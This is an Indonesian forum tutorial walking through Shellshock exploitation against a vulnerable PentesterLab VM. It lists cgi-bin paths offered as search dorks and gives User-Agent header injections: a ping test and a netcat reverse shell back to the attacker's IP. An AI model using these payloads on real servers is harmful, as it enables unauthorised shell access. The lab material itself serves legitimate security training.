[Share] Exploitasi Shellshock Vulnerability
#1
Ini adalah materi dari sub regional sub solo bulan september kemarin, langsung aja bagaimana cara exploitasi celah yang begitu hot2nya pada bulan september.
1. Untuk melakukan pengujian shellshock secara legal, download ISO dari Pentesterlab dimana di ISO tersebut memiliki kerentanan yaitu Shellshock. Download disini CVE-2014-6271 vulnerable VM

2. Setelah didownload, buka menggunakan VMware, kemudian setting IP dan Netmasknya.
Contoh : ifconfig eth0 172.16.208.20 netmask 255.255.255.0
[Image: image.png]
3. Setelah itu ,akses IP tadi dari sisi client / Attacker.

[Image: image.png]
4. Mengakses cgi-bin ,dimana shellshock bisa dieksploitasi dari sisi webserver apabila web tersebut memiliki cgi-bin yang aktif. Untuk dork cgi-bin bisa gunakanan ini :
Code:
/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi
/xul/
/cgi-bin/status
/tmUnblock.cgi
/gitweb/
/gitweb.cgi
/gitweb/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/cgi-bin/test-cgi
/sys-cgi
/dana-na/auth/url_default/welcome.cgi
/cgi-bin/tree.php
/cgi-bin/ICuGI/EST/blast_detail.cgi
/cgi-bin/hello
/cgi-sys/defaultwebpage.cgi
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi
[Image: image.png]
5. Untuk menguji apakah target vulner terhadap shellsock, saya mencoba dengan menerapkan firewall log icmp ,agar ketika saya melakukan injeksi dengan perintah ping dapat terlog oleh system saya.
[Image: image.png]
6. Buka Live Http header ( Add Ons Mozilla Firefox )
[Image: image.png]
7. Pada bagian User-Agent saya ganti dengan injeksi shellshock, berikut injeksinya
() { :;}; /bin/bash -c “ping 172.16.208.2” IP 172.16.208.2 adalah IP Laptop saya. Kemudian Klick Replay pada Live HTTP Headernya.
[Image: image.png]
8. Melakukan cek log apakah ada protocol icmp ( ping ) yang masuk , tail -f /var/log/messages
[Image: image.png]
9. Saya mendapatkan log dimana SRC 172.16.208.20 dengan DST 172.16.208.2 berhubungan melalui protocol ICMP. Dengan begini, berarti injeksi tadi berhasil dan system target mempunyai vulner shellshock.

10. Mencoba melakukan BACK-CONNECT dengan NC untuk mendapatkan akses Shell.
11. Saya membuat listening terlebih dahulu menggunakan NC.
[Image: image.png]
12. Kemudian kembali ke Live HTTP Header dan masukan injeksi ini :

() { :;}; /bin/bash -c “nc 172.16.208.2 4444 –e /bin/bash -i”
Kemudian klick replay.
[Image: image.png]
13. Dan ,saya mendapatkan akses shell lewat NC.
[Image: image.png]
14. Untuk mendapatkan akses root, kita bisa melakukannya dengan local root exploit.


Messages In This Thread
Exploitasi Shellshock Vulnerability - by jrs_faisal - 11-14-2014, 07:35 PM




Users browsing this thread: 1 Guest(s)